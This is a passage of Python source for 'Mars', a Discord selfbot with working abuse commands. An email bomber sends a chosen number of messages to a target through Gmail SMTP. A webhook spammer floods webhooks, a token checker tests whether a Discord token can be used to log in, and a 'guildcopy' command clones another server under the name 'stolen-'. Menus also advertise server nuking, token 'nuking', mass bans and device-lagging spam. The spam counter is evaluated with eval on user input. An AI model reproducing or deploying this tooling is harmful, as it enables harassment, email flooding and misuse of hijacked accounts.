embed.set_footer(text="Mars | FAILED TO GET USERNAME") webhook.add_embed(embed) response = webhook.execute() def tokenprint(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.LIGHTRED_EX + "[Token]" + Fore.LIGHTWHITE_EX + " | " + message) if commandwebhook != "": webhook = DiscordWebhook(url=commandwebhook) embed = DiscordEmbed(title=f'[TOKEN]', description=f"" f"{message}" f"", color=16727357) embed.set_footer(text="Mars | Logged in as: " + bot.user.name) webhook.add_embed(embed) response = webhook.execute() def warningprint(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.LIGHTYELLOW_EX + "[Warning]" + Fore.LIGHTWHITE_EX + " | " + message) if commandwebhook != "": webhook = DiscordWebhook(url=commandwebhook) embed = DiscordEmbed(title=f'[WARNING]', description=f"" f"{message}" f"", color=16745506) embed.set_footer(text="Mars | Logged in as: " + bot.user.name) webhook.add_embed(embed) response = webhook.execute() def detection(message): print(Fore.LIGHTWHITE_EX + current_time + " | " + Fore.RED + "[Detection]" + Fore.LIGHTWHITE_EX + " | " + message) if commandwebhook != "": webhook = DiscordWebhook(url=commandwebhook) embed = DiscordEmbed(title=f'[DETECTION]', description=f"" f"{message}" f"", color=14155776) embed.set_footer(text="Mars | Logged in as: " + bot.user.name) webhook.add_embed(embed) response = webhook.execute() @bot.event async def on_connect(): if connected: print("") print(Fore.LIGHTWHITE_EX + "- - - - " + Fore.LIGHTRED_EX + "Mars" + Fore.LIGHTWHITE_EX + " - - - -") print(Fore.LIGHTRED_EX + "Status: " + Fore.GREEN + "CONNECTED") print(Fore.LIGHTRED_EX + "Account: " + Fore.LIGHTWHITE_EX + bot.user.name) print(Fore.LIGHTRED_EX + "ID: " + Fore.LIGHTWHITE_EX + str(bot.user.id)) print(Fore.LIGHTRED_EX + "Server-Count: " + Fore.LIGHTWHITE_EX + "" + str(len(bot.guilds)) + "") if nitrosniper == "true": print(Fore.LIGHTRED_EX + "Nitro-Sniper: " + Fore.GREEN + "Enabled") else: print(Fore.LIGHTRED_EX + "Nitro-Sniper: " + Fore.RED + "Disabled") if giveawaysniper == "true": print(Fore.LIGHTRED_EX + "Giveaway-Sniper: " + Fore.GREEN + "Enabled") else: print(Fore.LIGHTRED_EX + "Giveaway-Sniper: " + Fore.RED + "Disabled") else: print("Status: " + Fore.RED + "DISCONNECTED") if connected: eventprint("Mars is now online") else: connectionerrorprint("A fatal error has occurred") await bot.logout() input("Press enter key to continue") @bot.event async def on_relationship_remove(relationship): if logrelationships: if relationship.user.name != bot.user.name: eventprint(f"relationship has been ended between {bot.user.name} and {relationship.user.name}") @bot.event async def on_relationship_add(relationship): if logrelationships: if relationship.user.name != bot.user.name: eventprint(f"relationship has been started between {bot.user.name} and {relationship.user.name}") @bot.event async def on_message_delete(message): if deletedmessagelogger == "true": guild = message.guild if not guild: if message.author.id != bot.user.id: eventprint(f'{message.author} deleted a message | Channel: {message.channel} | Message: {message.content}') @bot.event async def on_command_error(ctx, error): if isinstance(error, CommandNotFound): commandprint("User has executed an invalid command".format(error)) em = discord.Embed(title="Command is invalid.", color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) return elif isinstance(error, commands.CheckFailure): commandprint("User is missing permissions to execute this command".format(error)) em = discord.Embed(title="Invalid permissions to execute this command.", color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) return raise error @bot.command(aliases=['help']) async def mars(ctx): await ctx.message.delete() commandprint("Command 'help' has been used by " + bot.user.name) embed = discord.Embed(title="", description=title + " \n", color=color) if helptextbold == "true": embed = discord.Embed(title="", description=title + " \n", color=color) embed.add_field(name=f"**{helpcommandemoji} | Main**", value="**Main Commands** \n", inline=False) embed.add_field(name=f"**{helpcommandemoji} | Account**", value="**Account Commands** \n", inline=False) embed.add_field(name=f"**{helpcommandemoji} | Fun**", value="**Fun Commands** \n", inline=False) embed.add_field(name=f"**{helpcommandemoji} | Abuse**", value="**Abuse Commands** \n ", inline=False) embed.add_field(name=f"**{helpcommandemoji} | Cringe**", value="**Cringe Commands** \n", inline=False) embed.set_footer(text=footer) embed.set_image(url=helpimage) embed.set_thumbnail(url=helpthumbnail) await ctx.send("", embed=embed, delete_after=deletetimer) else: embed = discord.Embed(title="", description=title + " \n", color=color) embed.add_field(name=f"**{helpcommandemoji} | Main**", value="Main Commands \n", inline=False) embed.add_field(name=f"**{helpcommandemoji} | Account**", value="Account Commands \n", inline=False) embed.add_field(name=f"**{helpcommandemoji} | Fun**", value="Fun Commands \n", inline=False) embed.add_field(name=f"**{helpcommandemoji} | Abuse**", value="Abuse Commands \n ", inline=False) embed.add_field(name=f"**{helpcommandemoji} | Cringe**", value="Cringe Commands \n", inline=False) embed.set_footer(text=footer) embed.set_thumbnail(url=helpthumbnail) embed.set_image(url=helpimage) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def main(ctx): await ctx.message.delete() commandprint("Command 'main' has been used by " + bot.user.name) embed = discord.Embed(title=f"{helpcommandemoji} | Main", description="", color=color, ) embed.add_field(name="**INFO**", value="information about self-bot \n", inline=False) embed.add_field(name="**LOGOUT**", value="Logs you out of the selfbot \n", inline=False) embed.add_field(name="**UPTIME**", value="Shows how long the selfbot has been online \n", inline=False) embed.add_field(name="**SETEMOJI**", value="changes the emojis in help command, default [優] \n", inline=False) embed.add_field(name="**SETTITLE**", value="changes the bot title \n", inline=False) embed.add_field(name="**SETPREFIX**", value="changes the bot prefix \n", inline=False) embed.add_field(name="**SETCONFIG**", value="changes the bot config \n", inline=False) embed.add_field(name="**SETSTREAMURL**", value="changes the stream url \n", inline=False) embed.add_field(name="**TOGGLENS**", value="toggles the nitro sniper \n", inline=False) embed.add_field(name="**TOGGLEGS**", value="toggles the giveaway sniper \n", inline=False) embed.add_field(name="**TOGGLEDML**", value="toggles the deleted message logger \n", inline=False) embed.add_field(name="**SETGMAILACCOUNT**", value="changes the gmail address used for gmail spammer \n", inline=False) embed.add_field(name="**SETGMAILPASSWORD**", value="changes the gmail password used for gmail spammer \n", inline=False) embed.add_field(name="**ASCII**", value="translates text into ascii", inline=False) embed.add_field(name="**PING**", value="checks if an ip or host is online", inline=False) embed.add_field(name="**IPLOOKUP**", value="gets the data of an ip address", inline=False) embed.add_field(name="**RESOLVE**", value="resolves the ip of a domain", inline=False) embed.add_field(name="**PORTS**", value="lists known ports of ip addresses", inline=False) embed.add_field(name="**GUILDICON**", value="gets the guilds icon", inline=False) embed.add_field(name="**EMOJISTEAL**", value="downloads all the emojis in a server", inline=False) embed.add_field(name="**USERINFO**", value="displays a users basic info", inline=False) embed.add_field(name="**FIRSTMESSAGE**", value="jump to the first message", inline=False) embed.add_field(name="**TRANSLATEFROM**", value="translates text into english", inline=False) embed.add_field(name="**TRANSLATETO**", value="translates your text into a specific language", inline=False) embed.add_field(name="**NAMEMC**", value="displays the info of a minecraft username", inline=False) embed.add_field(name="**SPAMWEBHOOK**", value="spams a webhook with a message and an amount", inline=False) embed.add_field(name="**TEXTTOBINARY**", value="translates text into binary", inline=False) embed.add_field(name="**BINARYTOTEXT**", value="translates binary from text", inline=False) embed.add_field(name="**CHECKTOKEN**", value="checks if a token is valid or not", inline=False) embed.set_footer(text=footer) embed.set_thumbnail(url=mainthumbnail) embed.set_image(url=mainimage) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def account(ctx): await ctx.message.delete() commandprint("Command 'account' has been used by " + bot.user.name) embed = discord.Embed(title=f"{helpcommandemoji} | Account", description="status may not work if you already have one", color=color, ) embed.add_field(name="**HYPESQUAD**", value="change your hypesquad \n", inline=False) embed.add_field(name="**EXPORTFRIENDS**", value="prints friends list to console \n", inline=False) embed.add_field(name="**AV**", value="get mentioned user profile picture \n", inline=False) embed.add_field(name="**STREAM**", value="add a stream status \n", inline=False) embed.add_field(name="**GAME**", value="add a game status \n", inline=False) embed.add_field(name="**WATCHING**", value="add a watching status \n", inline=False) embed.add_field(name="**LISTENING**", value="add a listening status \n", inline=False) embed.add_field(name="**CL**", value="clears chat \n", inline=False) embed.add_field(name="**ADMINCL**", value="clears chat in servers \n", inline=False) embed.add_field(name="**LEAVEALLGROUPS**", value="leave all groups \n", inline=False) embed.add_field(name="**TINYURL**", value="jump to the first message", inline=False) embed.set_footer(text=footer) embed.set_thumbnail(url=accountthumbnail) embed.set_image(url=accountimage) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def fun(ctx): await ctx.message.delete() commandprint("Command 'fun' has been used by " + bot.user.name) embed = discord.Embed(title=f"{helpcommandemoji} | Fun", description="", color=color, ) embed.add_field(name="**EMBED**", value="embeds your chosen message", inline=False) embed.add_field(name="**CHANGEMYMIND**", value="displays text on changemymind", inline=False) embed.add_field(name="**THREATS**", value="compares an image to other threats", inline=False) embed.add_field(name="**MAGIK**", value="warps an image to selected intensity", inline=False) embed.add_field(name="**IPHONEX**", value=" view an image on an iphonex", inline=False) embed.add_field(name="**DOXBIN**", value="searches something on doxbin", inline=False) embed.add_field(name="**PHUB**", value="searches something on pornhub", inline=False) embed.add_field(name="**YT**", value="searches something on youtube", inline=False) embed.add_field(name="**COVID**", value="shows status of covid-19", inline=False) embed.add_field(name="**TOPIC**", value="start a random topic", inline=False) embed.add_field(name="**QUESTION**", value="ask a question", inline=False) embed.add_field(name="**PENIS**", value="look down a users pants (dodgy)", inline=False) embed.add_field(name="**8BALL**", value="get an answer", inline=False) embed.add_field(name="**REVERSE**", value="make your text reversed", inline=False) embed.add_field(name="**TRUMPTWEET**", value="criminalize mr trump ", inline=False) embed.add_field(name="**TWEET**", value="fake tweet with username and message", inline=False) embed.add_field(name="**SHIP**", value="ships two names to a percentage", inline=False) embed.add_field(name="**GAY**", value="makes a users profile picture gay", inline=False) embed.add_field(name="**WASTED**", value="makes a users profile picture wasted from gta", inline=False) embed.add_field(name="**LYRICFINDER**", value="finds the lyrics of a song", inline=False) embed.add_field(name="**GENPASSWORD**", value="generate a random password", inline=False) embed.add_field(name="**FAKENITRO**", value="generate a fake discord nitro code", inline=False) embed.add_field(name="**IMG**", value="finds chosen image from the array", inline=False) embed.set_footer(text=footer) embed.set_thumbnail(url=funthumbnail) embed.set_image(url=funimage) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def abuse(ctx): await ctx.message.delete() commandprint("Command 'abuse' has been used by " + bot.user.name) embed = discord.Embed(title=f"{helpcommandemoji} | Abuse", description="", color=color, ) embed.add_field(name="**TOKENINFO**", value="shows sensitive data from a token", inline=False) embed.add_field(name="**NUKETOKEN**", value="Crash, glitch, remove friends of a token", inline=False) embed.add_field(name="**BAN**", value="ban an individual user", inline=False) embed.add_field(name="**UNBAN**", value="unban an individual user", inline=False) embed.add_field(name="**MASSBAN**", value="ban all users", inline=False) embed.add_field(name="**MASSUNBAN**", value="unban all users", inline=False) embed.add_field(name="**MASSKICK**", value="kicks all users", inline=False) embed.add_field(name="**NUKESERVER**", value="destroy entire server", inline=False) embed.add_field(name="**BANLIST**", value="display all currently banned users", inline=False) embed.add_field(name="**EMOJILAGGER**", value="spams emojies to lag a device", inline=False) embed.add_field(name="**ARABLAGGER**", value="spams arabic letters to lag devices", inline=False) embed.add_field(name="**CHANNELCRASHER**", value="spams unknown letters to lag devices", inline=False) embed.add_field(name="**SPAM**", value="spams chosen phrase", inline=False) embed.add_field(name="**GMAILSPAM**", value="spams a gmail with an amount and a message", inline=False) embed.set_footer(text=footer) embed.set_thumbnail(url=abusethumbnail) embed.set_image(url=abuseimage) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def cringe(ctx): await ctx.message.delete() commandprint("Command 'cringe' has been used by " + bot.user.name) embed = discord.Embed(title=f"{helpcommandemoji} | Cringe", description="WARNING: command may not work in dms.", color=color, ) embed.add_field(name="**KISS**", value="kiss another user", inline=False) embed.add_field(name="**CUDDLE**", value="cuddle another user", inline=False) embed.add_field(name="**PAT**", value="pat another user", inline=False) embed.add_field(name="**TICKLE**", value="tickle another user", inline=False) embed.add_field(name="**SLAP**", value="slap another user", inline=False) embed.add_field(name="**LESBIAN**", value="get lesbian shit", inline=False) embed.add_field(name="**LEWD**", value="get lewd images and gifs", inline=False) embed.add_field(name="**BLOWJOB**", value="you can imagine", inline=False) embed.add_field(name="**TITS**", value="at this point i don't need to explain", inline=False) embed.add_field(name="**BOOBS**", value="not explaining anymore", inline=False) embed.add_field(name="**HENTAI**", value="fuck off", inline=False) embed.set_footer(text=footer) embed.set_thumbnail(url=cringethumbnail) embed.set_image(url=cringeimage) await ctx.send("", embed=embed, delete_after=deletetimer) @bot.command() async def setconfig(ctx, configname = None): await ctx.message.delete() commandprint("Command 'setconfig' has been used by " + bot.user.name) if configname is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a configname \n" "Example: " + prefix + "setconfig default", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: if os.path.exists("data/configurations/" + configname + ".json"): with open("data/configurations/configsettings.json", "r") as f: config = json.load(f) config[str("config_name")] = configname with open("data/configurations/configsettings.json", "w") as f: json.dump(config, f, indent=4) eventprint("Configuration has been set to " + configname) embed = discord.Embed(title="CONFIGURATION CHANGED", description=f"Configuration is now '{configname}'. \n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: eventprint("Configuration not found.") embed = discord.Embed(title="CONFIGURATION", description=f"Could not find configuration with that name.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def fakenitro(ctx): await ctx.message.delete() commandprint("Command 'fakenitro' has been used by " + bot.user.name) try: code = ''.join(random.choices(string.ascii_letters + string.digits, k=16)) await ctx.send("https://discord.gift/" + code) except Exception as error: errorprint("Exception ' {0} ', unknown error ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: unknown error \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) # NOT FINISHED @bot.command() async def noleave(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'noleave' has been used by " + bot.user.name) try: #codeee ! print("d") except Exception as error: errorprint("Exception ' {0} ', unknown error ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: unknown error \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def genpassword(ctx): await ctx.message.delete() commandprint("Command 'genpassword' has been used by " + bot.user.name) try: alphabet = "abcdefghijklmnopqrstuvwxyz" upperalphabet = alphabet.upper() pw_len = 16 pwlist = [] for i in range(pw_len//3): pwlist.append(alphabet[random.randrange(len(alphabet))]) pwlist.append(upperalphabet[random.randrange(len(upperalphabet))]) pwlist.append(str(random.randrange(16))) for i in range(pw_len-len(pwlist)): pwlist.append(alphabet[random.randrange(len(alphabet))]) random.shuffle(pwlist) pwstring = "".join(pwlist) embed = discord.Embed(title=f"**PASSWORD GENERATED**", description="Your generated password is " + pwstring + "", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', unknown error ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: unknown error \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def checktoken(ctx, *, token = None): await ctx.message.delete() commandprint("Command 'checktoken' has been used by " + bot.user.name) if token is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a token \n" "Example: " + prefix + "checktoken token", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: headers = {'Content-Type': 'application/json', 'authorization': token} url = 'https://discordapp.com/api/v6/users/@me/library' re = requests.get(url, headers=headers) if re.status_code == 200: embed = discord.Embed(title=f"**TOKEN CHECKER**", color=color) embed.add_field(name="**TOKEN VALID.**", value="This token is valid, meaning you can login or use commands against the token \n", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: embed = discord.Embed(title=f"**TOKEN CHECKER**", color=color) embed.add_field(name="**TOKEN INVALID.**", value="The token has either been disabled, or the password is changed \n", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', argument error ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: argument error \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def gmailspam(ctx, target = None, counter: eval = None, *, message = None): await ctx.message.delete() if target is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a target \n" "Example: " + prefix + "gmailspam mars@gmail.com 50 wag1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif counter is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a counter \n" "Example: " + prefix + "gmailspam mars@gmail.com 50 wag1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif message is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "gmailspam mars@gmail.com 50 wag1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: _smpt = smtplib.SMTP('smtp.gmail.com', 587) _smpt.starttls() try: _smpt.login(gmailaccount, gmailaccountpassword) except: errorprint(f"Incorrect Password or gmail account, make sure you've enabled less-secure apps access"+Fore.RESET) embed = discord.Embed(title=f"**ERROR:**", color=color) embed.add_field(name="**Incorrect Password or gmail account**", value="make sure you've enabled less-secure apps access \n", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: count = 0 embed=discord.Embed(title=f"**EMAIL SPAMMER**", color=color) embed.add_field(name="**SPAMMING**", value=target + " \n", inline=False) embed.add_field(name="**AMOUNT**", value=(str(counter)) + " \n", inline=False) embed.add_field(name="**MESSAGE**", value=message + " \n", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) while count < counter: _smpt.sendmail(gmailaccount, target, message) count += 1 eventprintnowebhook("Gmail Spammer | Email sent, total " + (str(count))) if count == counter: embed = discord.Embed(title=f"**EMAIL SPAMMER | PROCESS COMPLETE**", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid email?, Invalid Logins? ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid email?, Invalid Logins? \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def ship(ctx, name1 = None, name2 = None): await ctx.message.delete() commandprint("Command 'ship' has been used by " + bot.user.name) if name1 is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a name1 \n" "Example: " + prefix + "ship flairings culur", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif name2 is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a name2 \n" "Example: " + prefix + "ship flairings culur", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: name1letters = name1[:round(len(name1) / 2)] name2letters = name2[round(len(name2) / 2):] shippedname = "".join([name1letters, name2letters]) randomvalue = randint(1, 100) embed=discord.Embed(title=f"**:heart: MATCHMAKING** :heart:", description=f":small_red_triangle_down: {name1} \n" f" :small_red_triangle: {name2} \n \n" f":twisted_rightwards_arrows: **{shippedname}** \n" f"**{randomvalue}%** Match", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def spamwebhook(ctx, spamwebhook = None, amount = None, *, message = None): commandprint("Command 'spamwebhook' has been used by " + bot.user.name) if spamwebhook is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a spamwebhook \n" "Example: " + prefix + "spamwebhook link 5 hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif amount is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a amount \n" "Example: " + prefix + "spamwebhook link 5 hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif message is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "spamwebhook link 5 hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed=discord.Embed(title=f"**SPAMMING WEBHOOK**", color=color) embed.add_field(name="**SPAMMING**", value=spamwebhook + " \n", inline=False) embed.add_field(name="**AMOUNT**", value=(str(amount)) + " \n", inline=False) embed.add_field(name="**MESSAGE**", value=message + " \n", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) webhook = DiscordWebhook(url=spamwebhook, content=message) for _ in range((int(amount))): await asyncio.sleep(0.20) sent_webhook = webhook.execute() except Exception as error: errorprint("Exception ' {0} ', Webhook not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Webhook not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) # fun fact # listening to Baby by justin bieber rn. slaps. @bot.command() async def namemc(ctx, username = None): await ctx.message.delete() commandprint("Command 'namemc' has been used by " + bot.user.name + " with a username of '" + username + "'") if username is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a username \n" "Example: " + prefix + "namemc culur", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: names = [] names.clear() req = requests.get(f'https://playerdb.co/api/player/minecraft/{username}') if 'code":"player.found"' in req.text: embed=discord.Embed(title=f"**{username} | MC INFORMATION**", color=color) embed.add_field(name="**Full UUID:**", value=f"{req.json()['data']['player']['id']}", inline=False) embed.add_field(name="**Trimmed UUID:**", value=f"{req.json()['data']['player']['raw_id']}", inline=False) for name in req.json()['data']['player']['meta']['name_history']: names.append(name['name']) embed.add_field(name="**Passed Usernames**", value=f"({len(names)}): {names}", inline=False) embed.set_footer(text=footer) embed.set_thumbnail(url="https://crafatar.com/avatars/" + f"{req.json()['data']['player']['id']}") await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Username not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Username not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def translateto(ctx, language = None, *, text = None): await ctx.message.delete() commandprint("Command 'translateto' has been used by " + bot.user.name) if language is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a language \n" "Example: " + prefix + "translateto fr hello sir yes yes", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "translateto fr hello sir yes yes", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed=discord.Embed(title=f"**TRANSLATED**", description="Your translated text is '" + ts.google(text, to_language=language, from_language='auto') + "'", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Unknown language ".format(error)) em = discord.Embed(title="Exception Error:", description=f"Expected Exception: Sentances must be QUOTED example " + prefix + "lang 'hello' de \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def translatefrom(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'translatefrom' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "translatefrom hola si si", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed=discord.Embed(title=f"**TRANSLATED**", description="Your translated text is '" + ts.google(text) + "'", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Unknown language ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Unknown language \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def resolve(ctx, hostname = None): await ctx.message.delete() commandprint("Command 'resolve' has been used by " + bot.user.name) if hostname is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a hostname \n" "Example: " + prefix + "resolve google.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: ip = socket.gethostbyname(hostname) embed=discord.Embed(title=f"**RESOLVED**", color=color) embed.add_field(name="**" + hostname + "**", value=ip + " \n", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Domain not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Domain not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def ports(ctx): await ctx.message.delete() commandprint("Command 'ports' has been used by " + bot.user.name) try: embed=discord.Embed(title=f"**PORTS**", color=color) embed.add_field(name="**SFTP**", value="21 \n", inline=True) embed.add_field(name="**SSH**", value="22 \n", inline=True) embed.add_field(name="**TELNET**", value="23 \n", inline=True) embed.add_field(name="**SMTP**", value="25 \n", inline=True) embed.add_field(name="**DNS**", value="53 \n", inline=True) embed.add_field(name="**HTTP**", value="80 \n", inline=True) embed.add_field(name="**HTTPS**", value="443 \n", inline=True) embed.add_field(name="**OVH**", value="992 \n", inline=True) embed.add_field(name="**NFO**", value="1192 \n", inline=True) embed.add_field(name="**XBOX**", value="3074 \n", inline=True) embed.add_field(name="**VPN**", value="7777 \n", inline=True) embed.add_field(name="**PS4**", value="9707 \n", inline=True) embed.add_field(name="**HOTSPOT**", value="9286 \n", inline=True) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def guildcopy(ctx): await ctx.message.delete() commandprint("Command 'guildcopy' has been used by " + bot.user.name) await bot.create_guild(f'stolen-{ctx.guild.name}') await asyncio.sleep(3) for g in bot.guilds: if f'stolen-{ctx.guild.name}' in g.name: for c in g.channels: await c.delete() for r in ctx.guild.roles: await g.create_role(name=r.name, permissions=r.permissions, colour=r.colour, hoist=r.hoist, mentionable=r.mentionable) for cate in ctx.guild.categories: x = await g.create_category(f"{cate.name}") for chann in cate.channels: if isinstance(chann, discord.VoiceChannel): await x.create_voice_channel(f"{chann}") if isinstance(chann, discord.TextChannel): await x.create_text_channel(f"{chann}") for r in ctx.guild.roles: for role in g.roles: if r.position == 0: return if r.position < 1: return await role.edit(position=r.position) @bot.command() async def mcserver(ctx, domain = None): await ctx.message.delete() if domain is None: commandprint("Command 'mcserver' has been used by " + bot.user.name + " with no domain") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a domain \n" "Example: " + prefix + "mcserver veltpvp.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: p = requests.get(f'https://api.mcsrvstat.us/2/{domain}') if 'online":true' in p.text: commandprint("Command 'mcserver' has been used by " + bot.user.name + " with a domain of '" + domain + "'") try: embed=discord.Embed(title=f"**MC SERVER INFORMATION | {domain}**", color=color) embed.add_field(name="IP", value=f"{p.json()['ip']}", inline=False) embed.add_field(name="Port:", value=f"{p.json()['port']}", inline=False) embed.add_field(name="Version:", value=f"{p.json()['version']}", inline=False) embed.add_field(name="Players:", value=f"{p.json()['players']['online']}/{p.json()['players']['max']}", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) else: embed = discord.Embed(title=f"**{domain} IS OFFLINE**", description="Make sure you have the DOMAIN correct.", color=errorcolor) embed.set_footer(text=footer + " | this command was made by Rith#2491") await ctx.send(embed=embed, delete_after=deletetimer) @bot.command() async def embed(ctx, message = None): await ctx.message.delete() commandprint("Command 'embed' has been used by " + bot.user.name) if message is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "embed bruh", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed = discord.Embed(title=message, color=color) await ctx.send("", embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def userinfo(ctx, member: discord.User=None): await ctx.message.delete() commandprint("Command 'userinfo' has been used by " + bot.user.name) if member is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "userinfo @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: if not member: # if member is no mentioned member = ctx.message.author # set member as the author roles = [role for role in member.roles] embed = 